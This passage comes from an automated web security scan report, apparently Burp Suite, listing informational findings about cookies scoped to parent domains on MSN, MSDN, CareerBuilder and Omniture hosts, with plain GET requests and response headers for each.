Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49419
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...

16.135. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 52719
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...

16.136. http://movies.redacted/showtimes/showtimes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /showtimes/showtimes.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showtimes/showtimes.aspx HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 135
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /showtimes/?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: THTR=IPP=5; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: MC1=V=3&GUID=9fe02721dc3a4a9c834efd7852955ccc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:40 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fshowtimes%2f%3f">here</a>.</h2>
</body></html>

16.137. http://movies.redacted/the-rundown/the-guard/story_5/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /the-rundown/the-guard/story_5/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 65403
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Movies
...[SNIP]...

16.138. http://msdn.microsoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:50 GMT
Content-Length: 124

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/">here</a>.</h2>
</body></html>

16.139. http://msdn.microsoft.com/en-us/library/cc838158(VS.95

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc838158(VS.95

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Content not fou
...[SNIP]...

16.140. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc838158(VS.95).aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: TocHashCookie=ms310241(n)/aa139615(n)/cc838813(VS.95,n)/; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Silverlight

</
...[SNIP]...

16.141. http://msdn.microsoft.com/en-us/library/ff637515(VS.92

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff637515(VS.92

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14228
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Content not fou
...[SNIP]...

16.142. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff637515(VS.92).aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21669
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: TocHashCookie=ms310241(n)/aa187916(n)/ff403849(VS.92,n)/na/; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Design Resource
...[SNIP]...

16.143. http://msn.careerbuilder.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 0
Location: http://msn.careerbuilder.com/msn/default.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=3f30430db87e4e269a85cb0eeebc1aac-349650951-x6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842D559454AB8AE26C0EE1866FEBFDE6D9E24188B0257E60F8847335758E3A1239E4168099294A9A3E8; domain=.careerbuilder.com; expires=Mon, 30-Jan-2012 02:15:51 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEBTEST1
Date: Sun, 30 Jan 2011 02:15:51 GMT
Connection: close


16.144. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58233
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=217c15685a7947bc834d222ac5644fdb-349642135-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842A95BF216FF78EBA0B15DE7242A948C767593FFCBD9946DC3EE96BBC153A559E56DD81A338B99D40F; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB50
Date: Sat, 29 Jan 2011 23:48:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...

16.145. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60802
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=1376ce83848c458bad9f9645f4c3cfa3-349642136-XH-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842F532F2B54CCD51E8D85817405B60EDB414DD584DBAE145C363A33CFCCCD28ABE3843C2AB1513C2FD; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB48
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...

16.146. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61729
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=395818babba7496ca7f1ec46d56b6afc-349642127-XB-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8425FF500443C942BAF241B9E407CBF4C42B5FD4C39911286DBFFBA30E2FAA02C46E8E850F0AD333FE8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR42
Date: Sat, 29 Jan 2011 23:48:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...

16.147. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60120
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=3eb01fb472e34dfbb522cdac313c9679-349642137-w6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C84271DBE1DDB3CC2075D4566E934132B9FE8F5A3AD8D64E2A0E08564952FD43F1D0830940A7662B16DF; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...

16.148. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /jobseeker/jobs/jobResults.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobseeker/jobs/jobResults.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186049
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sat, 29 Jan 2011 23:49:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Job Se
...[SNIP]...

16.149. http://msn.careerbuilder.com/msn/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /msn/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /msn/default.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67783
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=a1015ecbf19144f8ae5b365846c3aa34-349642122-XC-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842F6D25E611765960B75D9DDF2256A2305A68D4A4064297C578D46EDCBE5C2F36EC73EE09F4CCCAF3E; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:42 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sat, 29 Jan 2011 23:48:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...

16.150. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.112.2o7.net
Path:   /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www383
Content-Length: 0
Content-Type: text/plain
Connection: close


16.151. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.112.2o7.net
Path:   /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

